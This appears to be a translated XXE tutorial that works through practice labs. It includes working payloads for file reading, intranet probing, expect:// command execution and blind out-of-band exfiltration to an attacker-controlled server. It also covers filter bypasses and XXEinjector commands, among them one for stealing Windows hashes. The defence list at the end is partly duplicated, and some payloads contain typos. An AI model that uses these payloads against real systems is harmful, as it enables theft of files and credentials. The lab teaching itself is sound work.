Article directory
XXE vulnerability
1. Basic concepts
1.1 Basic concepts of XML
XML is designed to transmit and store data. The XML document structure includes XML declarations, DTD document type definitions (optional), and document elements. Its focus is the content of the data. It separates the data from HTML and is information independent of software and hardware. transfer tool. The full name of the XXE vulnerability is XML External Entity Injection, which is an XML external entity injection vulnerability. The XXE vulnerability occurs when the application parses XML input and does not prohibit the loading of external entities. As a result, malicious external files can be loaded, causing file reading, command execution, and intranet failure. Port scanning, attacking intranet websites and other hazards.
1.2 Main differences between XML and HTML
XML is designed to transport and store data, with the focus being the content of the data .
HTML was designed to display data, with the focus being on the appearance of the data .
HTML is designed to display information, while XML is designed to transmit information.
1.3 xml example
<!--文档类型定义-->
<!DOCTYPE note [ <!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)> <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)> <!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)> <!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)> <!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)> <!--定义body元素为"#PCDATA"类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>
2. Demonstration case
2.1 pikachu shooting range XML
| libxml2 | PHP | Java | .NET |
|---|---|---|---|
| file http ftp |
file http ftp php compress.zlib compress.bzip2 data glob phar |
http https ftp file jar netdoc mailto gopher * |
file http https ftp |
Open the shooting range
2.1.1 File reading
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<x>&xxe;</x>
Note : The prerequisite for file reading is that there must be a file to read.
2.1.2 Intranet probes or attacks on intranet applications (triggering vulnerability addresses)
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY wuhu SYSTEM "http://192.168.188.194:80/index.txt">
]>
<x>&wuhu;</x>
The above IP address is assumed to be the IP address of a server on the intranet. You can also perform a port scan to see if the port is open.
If the accessed file does not exist, the following information will be displayed:
Note : This situation is generally not easy to encounter in actual combat, because there are many prerequisites. It is certain that the file exists on the intranet and that the vulnerability exists. You must also make sure that the IP address exists on the intranet.
2.1.4 RCE
This CASE is to execute system commands in the PHP environment where the expect extension is installed.
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "expect://id">
]>
<x>&xxe;</x>
id is the command to be executed. Actual combat situations are more difficult to encounter.
2.1.5 Introducing external entity DTD
<?xml version = "1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
%file;
]>
<x>&send;</x>
evil2.dtd file
The contents of the file are as follows:
<!ENTITY send SYSTEM "file:///c:/wuhu.txt">
Condition : Check whether the other party's application has disabled external entity references. This is also a measure to prevent XXE.
2.1.6 Reading files without echo
First comment out the echo code of the shooting range
Attack code:
<?xml version = "1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/wuhu.txt">
<!ENTITY % dtd SYSTEM "http://192.168.188.197/test.dtd">
%dtd;
%send;
]>
test.dtd:
<!ENTITY % payload
"<!ENTITY % send SYSTEM
'http://192.168.188.197/?data=%file;'>"
>
%payload;
The URL above is usually our own website. We access the file through the first step, then access the dtd file, and assign the read data to data. Then we only need to save it in our own website log, or write a php script. You can see the file data read.
Enable phpstudy–apache log
Then perform the attack, no response is displayed, and check the log information.
3. XXE Bypass
Keywords such as 'ENTITY' 'YSTEM' 'file' are filtered
Use encoding to bypass: UTF-16BE
cat payload.xml | iconv -f utf-8 -t utf-16be > payload.8-16be.xml
If http is filtered, you can use the following to bypass it
3.1 data:// protocol bypass
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a " <!ENTITY % b SYSTEM 'http://118.25.14.40:8200/hack.dtd'> ">
%a;
%b;
]>
<test>&hhh;</test>
3.2 file:// protocol plus file upload
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "file:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
%a;
]>
<!--上传文件-->
<!ENTITY % b SYSTEM 'http://118.25.14.40:8200/hack.dtd'>
3.3 php://filter protocol plus file upload
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "php://filter/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
%a;
]>
<test>
&hhh;
</test>
<!--上传文件-->
<!ENTITY hhh SYSTEM 'php://filter/read=convert.base64-encode/resource=./flag.php'>
<?xml version="1.0" ?>
<!DOCTYPE test [
<!ENTITY % a SYSTEM "php://filter/read=convert.base64-decode/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg">
%a;
]>
<test>
&hhh;
</test>
<!--上传文件-->
PCFFTlRJVFkgaGhoIFNZU1RFTSAncGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS4vZmxhZy5waHAnPg==
4. XXE Shooting Range
4.1 xxe-lab shooting range
https://github.com/c0ny1/xxe-lab
Use bp to capture the data packet and find that the Content-Type parameter is application/xml, indicating that the xml language is used to transmit data. And the code in the transferred data is also written in xml language. This proves the existence of the XXE vulnerability.
Payload:
<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///C:/wuhu.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>
Send the data packet to the Request module, then copy the attack payload to the specified location and send the packet.
Read the file to get the username and password
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note[
<!ENTITY test SYSTEM "PHP://filter/read=convert.base64-encode/resource=C:/software/phpstudy_pro/WWW/xxe-lab-master/php_xxe/doLogin.php">
]>
<user><username>admin;&test;</username><password>123456</password></user>
Base64 decode the read content:
Return to the page to log in.
4.2 CTF-Jarvis-OJ-Web-XXE
Access the page as follows
Click Go! and use BurpSuite to capture the packets
It is found that the parameter of Content-Type is of application/json type, and the data format passed is JSON format.
Then we can modify the Content-Type type to xml and submit the constructed Payload.
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY ss SYSTEM "file:///etc/passwd">
]>
<x>&ss;</x>
Read the shadow file under etc
4.3 Vulnhub/XXE Lab: 1
Range address: Vulnhub/XXE Lab: 1 .
Download link: Download (Mirror) .
5. XXE Tools
XXEinjector itself provides a very rich set of operating options, so before using XXEinjector for penetration testing, please study and understand these configuration options to maximize the functionality of XXEinjector. Of course, since XXEinjector is developed based on Ruby, a Ruby running environment is necessary. It is recommended to run in the kali environment.
5.1 Get address
https://github.com/enjoiz/XXEinjector
https://github.com/enjoiz/XXEinjector/archive/master.zip
5.2 Parameter description
--host # 必填项– 用于建立反向链接的IP地址。(--host=192.168.0.2)
--file # 必填项- 包含有效HTTP请求的XML文件。(--file=/tmp/req.txt)
--path # 必填项-是否需要枚举目录 – 枚举路径。(--path=/etc)
--brute # 必填项-是否需要爆破文件 -爆破文件的路径。(--brute=/tmp/brute.txt)
--logger # 记录输出结果。
--rhost # 远程主机IP或域名地址。(--rhost=192.168.0.3)
--rport # 远程主机的TCP端口信息。(--rport=8080)
--phpfilter # 在发送消息之前使用PHP过滤器对目标文件进行Base64编码。
--netdoc # 使用netdoc协议。(Java).
--enumports # 枚举用于反向链接的未过滤端口。(--enumports=21,22,80,443,445)
--hashes # 窃取运行当前应用程序用户的Windows哈希。
--expect # 使用PHP expect扩展执行任意系统命令。(--expect=ls)
--upload # 使用Java jar向临时目录上传文件。(--upload=/tmp/upload.txt)
--xslt # XSLT注入测试。
--ssl # 使用SSL。
--proxy # 使用代理。(--proxy=127.0.0.1:8080)
--httpport # Set自定义HTTP端口。(--httpport=80)
--ftpport # 设置自定义FTP端口。(--ftpport=21)
--gopherport # 设置自定义gopher端口。(--gopherport=70)
--jarport # 设置自定义文件上传端口。(--jarport=1337)
--xsltport # 设置自定义用于XSLT注入测试的端口。(--xsltport=1337)
--test # 该模式可用于测试请求的有效。
--urlencode # URL编码,默认为URI。
--output # 爆破攻击结果输出和日志信息。(--output=/tmp/out.txt)
--timeout # 设置接收文件/目录内容的Timeout。(--timeout=20)
--contimeout # 设置与服务器断开连接的,防止DoS出现。(--contimeout=20)
--fast # 跳过枚举询问,有可能出现结果假阳性。
--verbose # 显示verbose信息。
5.3 Tool usage
Enumerate the /etc directory in an HTTPS application:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt –ssl
Use gopher (OOB method) to enumerate the /etc directory:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
Secondary exploit:
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt--2ndfile=/tmp/2ndreq.txt
Exploit files using HTTP out-of-band methods and netdoc protocol:
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt--file=/tmp/req.txt --oob=http –netdoc
Resource enumeration via direct exploit:
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
Enumerate unfiltered ports:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
Steal Windows hashes:
ruby XXEinjector.rb--host=192.168.0.2 --file=/tmp/req.txt –hashes
Upload files using Java jar:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt--upload=/tmp/uploadfile.pdf
Use PHP expect to execute system commands:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter--expect=ls
Test XSLT injection:
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt –xslt
Log request information:
ruby XXEinjector.rb --logger --oob=http--output=/tmp/out.txt
6. XXE Security Defense
To prevent XXE attacks, you can take the following measures:
- Input validation and filtering: Perform strict input validation and filtering on received XML input. Ensure that only XML data that conforms to the expected format and structure is accepted and that untrusted or unusual input is rejected.
- Disable external entity parsing: In the XML parser, disable or limit the parsing of external entities. This can be accomplished by setting parser parameters, using security configuration files (such as XXE defense templates), or programmatically.
- Use local DTD: Avoid using external DTD (Document Type Definition) files and use local DTD or inline DTD to define the XML structure. This prevents attackers from leveraging external entity declarations.
- Disable network access when parsing: Configure the XML parser to ensure that access to external network resources is disabled or restricted when parsing XML to prevent remote entities or resources from being loaded.
- Use a secure parsing library: Choose to use an XML parsing library that has undergone security audits and vulnerability fixes. Make sure to use the latest version of the parsing library and apply security patches promptly.
- Whitelist verification: Use whitelist verification to limit allowed entities and legal data types based on business needs. Only required entities and data types are allowed, other entities and untrusted data types are rejected.
- Security configuration: Configure security configurations for servers and applications, such as restricting file system access permissions, prohibiting external network requests, etc., to reduce attack surfaces and risks.
- Upgrade to the latest XML specification: Use the latest XML specification, such as XML 1.1 version, which has some improvements and fixes for XXE attacks in the new specification.
Parser parameters, using security configuration files (such as XXE defense templates), or programmatically. - Use local DTD: Avoid using external DTD (Document Type Definition) files and use local DTD or inline DTD to define the XML structure. This prevents attackers from leveraging external entity declarations.
- Disable network access when parsing: Configure the XML parser to ensure that access to external network resources is disabled or restricted when parsing XML to prevent remote entities or resources from being loaded.
- Use a secure parsing library: Choose to use an XML parsing library that has undergone security audits and vulnerability fixes. Make sure to use the latest version of the parsing library and apply security patches promptly.
- Whitelist verification: Use whitelist verification to limit allowed entities and legal data types based on business needs. Only required entities and data types are allowed, other entities and untrusted data types are rejected.
- Security configuration: Configure security configurations for servers and applications, such as restricting file system access permissions, prohibiting external network requests, etc., to reduce attack surfaces and risks.
- Upgrade to the latest XML specification: Use the latest XML specification, such as XML 1.1 version, which has some improvements and fixes for XXE attacks in the new specification.
- Security auditing and testing: Regularly conduct security auditing and testing, including code review, penetration testing and vulnerability scanning, to discover and fix potential XXE vulnerabilities.